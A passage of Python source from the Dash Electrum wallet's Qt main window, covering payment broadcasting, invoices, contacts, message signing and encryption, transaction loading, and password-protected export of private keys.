return False, f'{err_msg}{err_msg_info}'
except BestEffortRequestFailed as e:
err_msg = repr(e)
return False, f'{err_msg}{err_msg_info}'
# success
if pr:
self.payment_request = None
refund_address = self.wallet.get_receiving_address()
coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
ack_status, ack_msg = fut.result(timeout=20)
self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
if not need_broadcast:
return ack_status, ack_msg
return True, txid
# Capture current TL window; override might be removed on return
parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
def broadcast_done(result):
# GUI thread
if result:
success, msg = result
if success:
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
else:
msg = msg or ''
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b: bool) -> None:
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
def payment_request_ok(self):
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
pr = self.payment_request
if not pr:
return
key = pr.get_id()
invoice = self.wallet.get_invoice(key)
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setAmount(pr.get_amount())
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def set_onchain(self, b):
self._is_onchain = b
self.max_button.setEnabled(b)
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except InvalidBitcoinURI as e:
self.show_error(_("Error parsing URI") + f":\n{e}")
return
self.show_send_tab()
self.payto_URI = out
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.extra_payload.clear()
self.hide_extra_payload()
self.reset_privatesend()
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressModel, AddressList
self.address_model = AddressModel(self)
self.address_list = l = AddressList(self, self.address_model)
self.address_model.set_view(self.address_list)
l.setObjectName("addresses_container")
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', True))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOModel, UTXOList
self.utxo_model = UTXOModel(self)
self.utxo_list = l = UTXOList(self, self.utxo_model)
self.utxo_model.set_view(self.utxo_list)
l.setObjectName("utxo_container")
toolbar = l.create_toolbar(self.config)
toolbar_shown = bool(self.config.get('show_toolbar_utxos', True))
l.show_toolbar(toolbar_shown)
return self.create_list_tab(l, toolbar)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
l.setObjectName("contacts_container")
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
invoice_ext = self.wallet.get_invoice_ext(invoice.id)
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
d.setMinimumWidth(650)
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
if invoice_ext.is_ps:
amount_str = '%s %s' % (amount_str, _('PrivateSend'))
grid.addWidget(QLabel(amount_str), 1, 1)
tx_type = invoice_ext.tx_type
type_str = SPEC_TX_NAMES[tx_type]
grid.addWidget(QLabel(_('Type') + ':'), 2, 0)
grid.addWidget(QLabel(type_str), 2, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.get_address()), 3, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 3, 0)
grid.addWidget(QLabel(outputs_str), 3, 1)
grid.addWidget(QLabel(_("Description") + ':'), 4, 0)
grid.addWidget(QLabel(invoice.message), 4, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 5, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 5, 1)
extra_payload = invoice_ext.extra_payload
extra_payload = ProTxBase.from_hex_str(tx_type, extra_payload)
if tx_type and extra_payload:
epw = ExtraPayloadWidget(self)
epw.set_extra_data(tx_type, extra_payload)
grid.addWidget(epw, 6, 0, 1, -1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 7, 0)
grid.addWidget(QLabel(pr.get_requestor()), 7, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 8, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 8, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console(parent=self)
console.setObjectName("console_container")
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum_dash,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setObjectName("main_window_balance")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
sb.addPermanentWidget(self.seed_button)
self.status_button = None
if self.network:
self.status_button = StatusBarButton(
read_QIcon("status_disconnected.png"), _("Electrum Network"),
lambda: self.gui_object.show_network_dialog())
sb.addPermanentWidget(self.status_button)
def on_dash_net_status_button():
self.gui_object.show_dash_net_dialog()
self.dash_net_button = StatusBarButton(read_QIcon('dash_net_0.png'),
_('Dash Network'),
on_dash_net_status_button)
self.update_dash_net_status_btn()
sb.addPermanentWidget(self.dash_net_button)
self.ps_button = StatusBarButton(read_QIcon('privatesend.png'),
'',
lambda: show_ps_dialog_or_wizard(self))
self.update_ps_status_btn()
sb.addPermanentWidget(self.ps_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
def change_password_dialog(self):
from electrum_dash.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
self.console_tab.update_lock_state()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(800, 100)
vbox = QVBoxLayout()
wallet_type = self.wallet.db.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('False')
if self.wallet.has_seed():
seed_available = _('True')
ks = self.wallet.keystore
assert isinstance(ks, keystore.Deterministic_KeyStore)
seed_available += f" ({ks.get_seed_type()})"
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
labels_clayout = None
if self.wallet.is_deterministic():
keystores = self.wallet.get_keystores()
ks_stack = QStackedWidget()
def select_ks(index):
ks_stack.setCurrentIndex(index)
# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
@ps_ks_protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
@ps_ks_protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Dash Electrum, but in general.')
@protected
@ps_ks_protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
if self.wallet.psman.is_ps_ks(address):
txin_type = self.wallet.psman.ps_ks_txin_type
else:
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Dash address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
@ps_ks_protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
if self.wallet.psman.is_ps_ks(address):
pubkey = self.wallet.psman.get_public_key(address)
else:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum_dash.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Dash Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
def cb(success: bool, error: str, data):
if not success:
if error:
self.show_error(error)
return
if not data:
return
# if the user scanned a dash URI
data_l = data.lower()
if (data_l.startswith(DASH_BIP21_URI_SCHEME + ':')
or data_l.startswith(PAY_BIP21_URI_SCHEME + ':')):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
scan_qrcode(parent=self.top_level_window(), config=self.config, callback=cb)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Dash Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum_dash import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected_with_parent
def export_privkeys_dialog(self, parent, password, ps_ks_only=False):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(parent, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-dash-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
w = self.wallet
if ps_ks_only:
addresses = w.psman.get_addresses()
else:
addresses = w.get_addresses() + w.psman.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Dash Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, FILE_OWNER_MODE)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def export_invoices_with_ext(self):
export_meta_gui(self, _('invoices_with_ext'),
self.wallet.export_invoices_with_ext)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
